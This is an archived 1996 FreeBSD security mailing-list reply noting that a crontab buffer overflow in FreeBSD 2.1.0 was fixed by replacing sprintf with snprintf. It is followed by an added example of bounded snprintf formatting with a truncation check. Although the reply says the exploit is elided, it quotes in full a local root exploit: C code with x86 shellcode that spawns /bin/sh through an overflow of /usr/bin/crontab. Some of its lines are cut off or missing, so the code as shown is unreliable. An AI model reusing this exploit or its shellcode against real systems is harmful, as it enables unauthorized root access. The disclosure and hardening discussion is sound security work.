From owner-freebsd-security Mon Dec 16 14:01:06 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06598 for security-outgoing; Mon, 16 Dec 1996 14:01:06 -0800 (PST)
Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA06585 for ; Mon, 16 Dec 1996 14:00:59 -0800 (PST)
Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2-biteme) with ESMTP id PAA16117; Mon, 16 Dec 1996 15:58:47 -0600 (CST)
Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id PAA20334; Mon, 16 Dec 1996 15:58:45 -0600 (CST)
Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id PAA19217; Mon, 16 Dec 1996 15:58:42 -0600 (CST)
From: Karl Denninger
Message-Id: <199612162158.PAA19217@Jupiter.Mcs.Net>
Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0).
To: leshka@leshka.chuvashia.su
Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST)
Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org
In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

(exploit elided)

This does not run on -CURRENT with crontab build dates after about mid-October.  A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail.
--
--
Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
http://www.mcs.net/~karl     | T1's from $600 monthly to FULL DS-3 Service
                             | 33 Analog Prefixes, 65 ISDN, Web servers $75/mo
Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
Fax:   [+1 312 248-9865]     | 2 FULL DS-3 Internet links; 400Mbps B/W Internal

> /* ---------------------------- CUT HERE ----------------------------------- */
> /*                                                                          */
> /*  Hi !                                                                    */
> /*  This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).        */
> /*  If you have any problems with it, drop me a letter.                     */
> /*  Have fun !                                                              */
> /*                                                                          */
> /*                                                                          */
> /*                    ----------------------                                */
> /*           ---------------------------------------------                  */
> /*  ----------------- Dedicated to my beautiful lady ------------------     */
> /*           ---------------------------------------------                  */
> /*                    ----------------------                                */
> /*                                                                          */
> /*  Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su              */
>
> #include
> main()
> {
> #define length 353
>   int i,j;
>   unsigned long start_addr;
>   char *env[]={NULL};
>   char param_string[length];
>   char code_string[]=
>   {
>                       "\xeb\x2a"                    /* jmp cont */
>
>     /* geteip: */     "\x5d"                        /* popl %ebp */
>                       "\x55"                        /* pushl %ebp */
>                       "\xfe\x4d\xe7"                /* decb 0xffffffe7(%ebp) */
>                       "\xfe\x4d\xeb"                /* decb 0xffffffeb(%ebp) */
>                       "\xfe\x4d\xec"                /* decb 0xffffffec(%ebp) */
>                       "\xfe\x4d\xed"                /* decb 0xffffffed(%ebp) */
>                       "\xff\x45\xef"                /* incl 0xffffffef(%ebp) */
>                       "\xfe\x4d\xf4"                /* decb 0xfffffff4(%ebp) */
>                       "\xc3"                        /* ret */
>
>     /* 0xffffffe0(%ebp): */ "/bin/sh"
>     /* 0xffffffe7(%ebp): */ "\x01"
>
>     /* execve: */     "\x8d\x05\x3b\x01\x01\x01"    /* leal 0x3b,%eax */
>                       "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */
>
>     /* cont: */       "\xc7\xc4XXXX"                /* movl $0xXXXXXXXX,%esp */
>                       "\xe8\xcb\xff\xff\xff"        /* call geteip */
>                       "\x81\xc5\xef\xff\xff\xff"    /* addl $0xffffffef,%ebp */
>                       "\x55"                        /* pushl %ebp */
>                       "\x55"                        /* pushl %ebp */
>                       "\x81\xc5\xf1\xff\xff\xff"    /* addl $0xfffffff1,%ebp */
>                       "\x55"                        /* pushl %ebp */
>                       "\xe8\xd4\xff\xff\xff"        /* call execve */
>   };
>
>   for(i=0;i
>   start_addr=0xefbfddf0;
>   *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
>   strncpy(&param_string[200],code_string,strlen(code_string));
>   *( (unsigned long*) &param_string[348])= start_addr;
>
>   execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
>
> }
> /* ---------------------------- CUT HERE ----------------------------------- */
>
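Karl's point is that the fix in -CURRENT was replacing an unbounded sprintf into a fixed-size buffer with snprintf. The following is an added example, not code from this thread or from FreeBSD's crontab source: it shows the bounded pattern with the check that makes it actually safe, since snprintf stops writing at the buffer's end but reports the length it wanted, and a caller that ignores that return value silently truncates instead of failing. The buffer size, the format string and the function names are assumptions for the illustration.

```c
/* Added example (not from the thread or from crontab): bounded formatting
 * of an untrusted argument into a fixed-size buffer, with the truncation
 * check that distinguishes "fits" from "would have overrun". */
#include <stdio.h>
#include <string.h>

#define MSGBUF 64   /* assumed fixed-size destination buffer */

/* Bytes the old unbounded sprintf("prefix%s") would write for arg, not
 * counting the NUL. If this reaches the buffer size, the unbounded call
 * runs past the end of the buffer. */
size_t needed_for(const char *fmt_prefix, const char *arg)
{
    return strlen(fmt_prefix) + strlen(arg);
}

/* Hardened version: snprintf never writes beyond dstlen bytes and always
 * NUL-terminates, but returns the full length it would have produced.
 * Returns 0 on success, -1 if arg did not fit (dst holds a truncated,
 * NUL-terminated string in that case and should be treated as invalid). */
int format_bounded(char *dst, size_t dstlen, const char *arg)
{
    int n = snprintf(dst, dstlen, "crontab: %s", arg);
    if (n < 0 || (size_t)n >= dstlen)
        return -1;      /* error or truncation: refuse rather than proceed */
    return 0;
}

/* Pre-check used by a caller that wants to reject over-long input before
 * formatting anything at all. Returns 1 if the unbounded pattern would
 * overrun a MSGBUF-byte buffer, 0 otherwise. */
int would_overflow(const char *arg)
{
    return needed_for("crontab: ", arg) >= MSGBUF;
}

int main(void)
{
    char buf[MSGBUF];
    char longarg[400];                      /* constructed over-long argument */
    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';

    printf("short arg: %s\n",
           format_bounded(buf, sizeof buf, "user1") == 0 ? "ok" : "rejected");
    printf("long arg would overrun sprintf buffer: %d\n", would_overflow(longarg));
    printf("long arg via snprintf: %s\n",
           format_bounded(buf, sizeof buf, longarg) == 0 ? "ok" : "truncated, rejected");
    return 0;
}
```

The check `n >= dstlen` is the part most often omitted: snprintf alone turns a stack overwrite into silent truncation, and only the return-value test turns it into a hard failure the program can act on.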